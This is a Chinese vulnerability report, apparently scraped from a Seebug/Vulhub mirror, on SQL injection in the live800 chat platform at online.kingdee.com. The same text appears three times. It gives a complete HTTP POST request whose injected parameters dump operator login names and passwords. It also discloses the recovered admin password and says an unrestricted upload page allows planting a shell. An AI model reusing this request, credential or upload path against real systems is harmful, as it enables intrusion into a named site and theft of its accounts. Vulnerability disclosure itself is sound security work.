VULHUB ™

### 简要描述： RT ### 详细说明： 漏洞网站：online.kingdee.com live800平台存在注入漏洞 ``` POST //live800/sta/export/referrerSta.jsp HTTP/1.1 Host: online.kingdee.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1439863446; Hm_lvt_329734d1d305dcdeae1b8e0ceccc6b2b=1439865398 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 182 export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-04-18&toTime=2016-04-19&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator) ``` [<img src="https://images.seebug.org/upload/201604/19175250c603119939b549beb9a14eccfaf3d66d.png" alt="1.png" width="600"...

### 简要描述： RT ### 详细说明： 漏洞网站：online.kingdee.com live800平台存在注入漏洞 ``` POST //live800/sta/export/referrerSta.jsp HTTP/1.1 Host: online.kingdee.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1439863446; Hm_lvt_329734d1d305dcdeae1b8e0ceccc6b2b=1439865398 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 182 export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-04-18&toTime=2016-04-19&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator) ``` [<img src="https://images.seebug.org/upload/201604/19175250c603119939b549beb9a14eccfaf3d66d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/19175250c603119939b549beb9a14eccfaf3d66d.png) 得到密码为：123qweasd 后台没有限制上传可以Getshell: /live800/addOperatorUtil.jsp?action=1 上传 ### 漏洞证明： 漏洞网站：online.kingdee.com live800平台存在注入漏洞 ``` POST //live800/sta/export/referrerSta.jsp HTTP/1.1 Host: online.kingdee.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1439863446; Hm_lvt_329734d1d305dcdeae1b8e0ceccc6b2b=1439865398 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 182 export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-04-18&toTime=2016-04-19&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator) ``` [<img src="https://images.seebug.org/upload/201604/19175250c603119939b549beb9a14eccfaf3d66d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/19175250c603119939b549beb9a14eccfaf3d66d.png) 得到密码为：123qweasd 后台没有限制上传可以Getshell: /live800/addOperatorUtil.jsp?action=1 上传